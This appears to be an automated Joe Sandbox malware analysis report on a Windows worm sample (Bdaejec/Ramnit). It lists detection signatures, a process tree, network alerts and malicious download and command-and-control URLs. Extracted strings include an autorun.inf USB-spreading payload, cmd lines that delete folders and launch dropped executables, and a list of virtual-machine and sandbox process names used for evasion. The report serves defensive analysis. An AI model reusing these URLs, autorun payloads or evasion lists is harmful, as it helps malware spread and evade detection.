Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002B_290.exe

Overview

General Information

Sample name:LisectAVT_2403002B_290.exe
Analysis ID:1481855
MD5:8da4d99ebba9a59fa372eefd2556860c
SHA1:658f27ff1ccc2b57eeaaf98ab469276efe9c8c51
SHA256:5e174f9e0b7b914a4717abc076ac00b3976e7a9a4abce6ca4170c8f267624c3c
Tags:exeWormRamnit
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Yara detected Bdaejec
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Contain functionality to detect virtual machines
Creates an autostart registry key pointing to binary in C:\Windows
Disables Windows system restore
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after checking volume information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Connects to many different domains
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • LisectAVT_2403002B_290.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_290.exe" MD5: 8DA4D99EBBA9A59FA372EEFD2556860C)
    • XBVdJN.exe (PID: 6516 cmdline: C:\Users\user\AppData\Local\Temp\XBVdJN.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 5716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1584 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • winsvcs.exe (PID: 2784 cmdline: C:\Windows\94000696690303050\winsvcs.exe MD5: 8DA4D99EBBA9A59FA372EEFD2556860C)
  • winsvcs.exe (PID: 6200 cmdline: "C:\Windows\94000696690303050\winsvcs.exe" MD5: 8DA4D99EBBA9A59FA372EEFD2556860C)
    • XBVdJN.exe (PID: 6256 cmdline: C:\Users\user\AppData\Local\Temp\XBVdJN.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • cmd.exe (PID: 1944 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winsvcs.exe (PID: 3796 cmdline: "C:\Windows\94000696690303050\winsvcs.exe" MD5: 8DA4D99EBBA9A59FA372EEFD2556860C)
    • XBVdJN.exe (PID: 3768 cmdline: C:\Users\user\AppData\Local\Temp\XBVdJN.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • cmd.exe (PID: 3792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: XBVdJN.exe PID: 6516JoeSecurity_BdaejecYara detected BdaejecJoe Security
    Process Memory Space: XBVdJN.exe PID: 6256JoeSecurity_BdaejecYara detected BdaejecJoe Security
      Process Memory Space: XBVdJN.exe PID: 3768JoeSecurity_BdaejecYara detected BdaejecJoe Security

        System Summary

        barindex
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\94000696690303050\winsvcs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe, ProcessId: 6732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\94000696690303050\winsvcs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe, ProcessId: 6732, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
        No Snort rule has matched
        Timestamp:2024-07-25T15:13:30.018479+0200
        SID:2028371
        Source Port:49726
        Destination Port:443
        Protocol:TCP
        Classtype:Unknown Traffic
        Timestamp:2024-07-25T15:15:33.325593+0200
        SID:2803274
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:15:13.424683+0200
        SID:2803274
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:13:19.352778+0200
        SID:2838522
        Source Port:61964
        Destination Port:53
        Protocol:UDP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T15:13:51.355961+0200
        SID:2807908
        Source Port:49738
        Destination Port:799
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T15:14:38.021714+0200
        SID:2803274
        Source Port:49747
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:16:11.428877+0200
        SID:2037771
        Source Port:80
        Destination Port:49764
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:16:36.375930+0200
        SID:2527002
        Source Port:80
        Destination Port:49770
        Protocol:TCP
        Classtype:Misc Attack
        Timestamp:2024-07-25T15:13:42.539489+0200
        SID:2803274
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:14:50.224302+0200
        SID:2037771
        Source Port:80
        Destination Port:49749
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:16:57.852843+0200
        SID:2803274
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:16:22.126954+0200
        SID:2803274
        Source Port:49767
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:13:41.635043+0200
        SID:2807908
        Source Port:49731
        Destination Port:799
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T15:16:02.561286+0200
        SID:2803274
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:15:59.589424+0200
        SID:2803274
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:15:22.630192+0200
        SID:2803274
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:13:37.565241+0200
        SID:2022930
        Source Port:443
        Destination Port:49729
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:15:47.481369+0200
        SID:2803274
        Source Port:49760
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:16:04.594112+0200
        SID:2803274
        Source Port:49763
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:13:24.873191+0200
        SID:2807908
        Source Port:49724
        Destination Port:799
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T15:16:03.569322+0200
        SID:2037771
        Source Port:80
        Destination Port:49762
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:16:00.606808+0200
        SID:2037771
        Source Port:80
        Destination Port:49761
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:16:10.422241+0200
        SID:2803274
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:13:47.058273+0200
        SID:2807908
        Source Port:49737
        Destination Port:799
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T15:15:46.397489+0200
        SID:2037771
        Source Port:80
        Destination Port:49759
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:14:28.521053+0200
        SID:2803274
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:14:59.237828+0200
        SID:2803274
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:13:53.993201+0200
        SID:2807908
        Source Port:49739
        Destination Port:799
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T15:15:45.378020+0200
        SID:2803274
        Source Port:49759
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:14:15.205118+0200
        SID:2022930
        Source Port:443
        Destination Port:49744
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:14:49.123532+0200
        SID:2803274
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:14:05.816494+0200
        SID:2803274
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:13:19.951471+0200
        SID:2807908
        Source Port:49722
        Destination Port:799
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T15:13:44.441888+0200
        SID:2807908
        Source Port:49735
        Destination Port:799
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T15:17:05.252309+0200
        SID:2803274
        Source Port:49771
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:16:04.594153+0200
        SID:2037771
        Source Port:80
        Destination Port:49763
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:15:29.430204+0200
        SID:2037771
        Source Port:80
        Destination Port:49755
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:16:30.553398+0200
        SID:2803274
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:15:28.415157+0200
        SID:2803274
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-25T15:16:27.854244+0200
        SID:2018316
        Source Port:53
        Destination Port:51387
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T15:16:13.644028+0200
        SID:2803274
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: LisectAVT_2403002B_290.exeAvira: detected
        Source: http://ddos.dnsnb8.net:799/cj//k3.rarURL Reputation: Label: malware
        Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
        Source: http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://fiiauediehduefuge.ru/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://srndndubsbsifurfd.biz/Avira URL Cloud: Label: malware
        Source: http://afeifieuuufufufuf.net/Avira URL Cloud: Label: malware
        Source: http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1OAvira URL Cloud: Label: malware
        Source: http://eofihsishihiursgu.su/Avira URL Cloud: Label: malware
        Source: http://eoroooskfogihisrg.in/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://nousiieiffgogogoo.com/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://eoroooskfogihisrg.biz/tldr.php?newinf=1KAvira URL Cloud: Label: malware
        Source: http://eiifngjfksisiufjf.com/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://fifiehsueuufidhfi.net/tldr.php?newinf=1PAvira URL Cloud: Label: malware
        Source: http://srndndubsbsifurfd.in/tldr.php?newinf=19hAvira URL Cloud: Label: malware
        Source: http://eoroooskfogihisrg.biz/tldr.php?newinf=1TAvira URL Cloud: Label: malware
        Source: http://aiiaiafrzrueuedur.info/Avira URL Cloud: Label: malware
        Source: http://eiifngjfksisiufjf.com/Avira URL Cloud: Label: malware
        Source: http://srndndubsbsifurfd.ru/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://fifiehsueuufidhfi.net/Avira URL Cloud: Label: malware
        Source: http://slpsrgpsrhojifdij.com/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://eoroooskfogihisrg.com/Avira URL Cloud: Label: malware
        Source: http://eoroooskfogihisrg.com/tldr.php?newinf=1wAvira URL Cloud: Label: malware
        Source: http://iuirshriuisruruuf.biz/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k3.rarwAvira URL Cloud: Label: phishing
        Source: http://afeifieuuufufufuf.in/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://nousiieiffgogogoo.su/tldr.php?newinf=1ohAvira URL Cloud: Label: malware
        Source: http://eoroooskfogihisrg.info/Avira URL Cloud: Label: malware
        Source: http://iuirshriuisruruuf.com/Avira URL Cloud: Label: malware
        Source: http://noeuaoenriusfiruu.in/Avira URL Cloud: Label: malware
        Source: http://srndndubsbsifurfd.biz/tldr.php?newinf=1Gj9Avira URL Cloud: Label: malware
        Source: http://srndndubsbsifurfd.su/http://fiiauediehduefuge.su/http://nousiieiffgogogoo.su/http://fifiehsueAvira URL Cloud: Label: malware
        Source: http://slpsrgpsrhojifdij.biz/Avira URL Cloud: Label: malware
        Source: http://nousiieiffgogogoo.ru/Avira URL Cloud: Label: malware
        Source: http://afeifieuuufufufuf.in/Avira URL Cloud: Label: malware
        Source: http://eoroooskfogihisrg.net/tldr.php?newinf=1YAAvira URL Cloud: Label: malware
        Source: http://iuirshriuisruruuf.ru/Avira URL Cloud: Label: malware
        Source: http://fuaiuebndieufeufu.in/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://eofihsishihiursgu.com/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://fifiehsueuufidhfi.net/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://aiiaiafrzrueuedur.in/Avira URL Cloud: Label: malware
        Source: http://fiiauediehduefuge.com/tldr.php?newinf=1Ck%Avira URL Cloud: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k3.rar:Avira URL Cloud: Label: malware
        Source: http://eoroooskfogihisrg.in/tldr.php?newinf=15i%Avira URL Cloud: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k1.rark8Avira URL Cloud: Label: malware
        Source: http://srndndubsbsifurfd.net/tldr.php?newinf=1AAvira URL Cloud: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k4.rarTAvira URL Cloud: Label: phishing
        Source: http://fuaiuebndieufeufu.net/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://iuirshriuisruruuf.net/Avira URL Cloud: Label: malware
        Source: http://srndndubsbsifurfd.su/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://noeuaoenriusfiruu.net/tldr.php?newinf=1=BZAvira URL Cloud: Label: malware
        Source: http://nousiieiffgogogoo.su/Avira URL Cloud: Label: malware
        Source: http://fuaiuebndieufeufu.su/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://fifiehsueuufidhfi.su/Avira URL Cloud: Label: malware
        Source: http://afeifieuuufufufuf.net/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k2.rarh?pAvira URL Cloud: Label: malware
        Source: http://srndndubsbsifurfd.in/tldr.php?newinf=1Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
        Source: C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Windows\94000696690303050\winsvcs.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exeJoe Sandbox ML: detected
        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
        Source: C:\Windows\94000696690303050\winsvcs.exeJoe Sandbox ML: detected
        Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
        Source: LisectAVT_2403002B_290.exeJoe Sandbox ML: detected

        Compliance

        barindex
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeUnpacked PE file: 0.2.LisectAVT_2403002B_290.exe.400000.0.unpack
        Source: C:\Windows\94000696690303050\winsvcs.exeUnpacked PE file: 9.2.winsvcs.exe.400000.0.unpack
        Source: C:\Windows\94000696690303050\winsvcs.exeUnpacked PE file: 14.2.winsvcs.exe.400000.0.unpack
        Source: LisectAVT_2403002B_290.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: Binary string: C:\Us .pdb source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

        Spreading

        barindex
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
        Source: LisectAVT_2403002B_290.exeBinary or memory string: %ls\autorun.inf
        Source: LisectAVT_2403002B_290.exeBinary or memory string: [autorun] open=_\DeviceManager.exe UseAutoPlay=1
        Source: LisectAVT_2403002B_290.exeBinary or memory string: autorun.inf
        Source: LisectAVT_2403002B_290.exeBinary or memory string: [autorun]open=_\DeviceManager.exeUseAutoPlay=1
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload*.*..Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload*.*..Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: winsvcs.exeBinary or memory string: %ls\autorun.inf
        Source: winsvcs.exeBinary or memory string: [autorun] open=_\DeviceManager.exe UseAutoPlay=1
        Source: winsvcs.exeBinary or memory string: autorun.inf
        Source: winsvcs.exeBinary or memory string: [autorun]open=_\DeviceManager.exeUseAutoPlay=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload*.*..Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload*.*..Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco44
        Source: winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
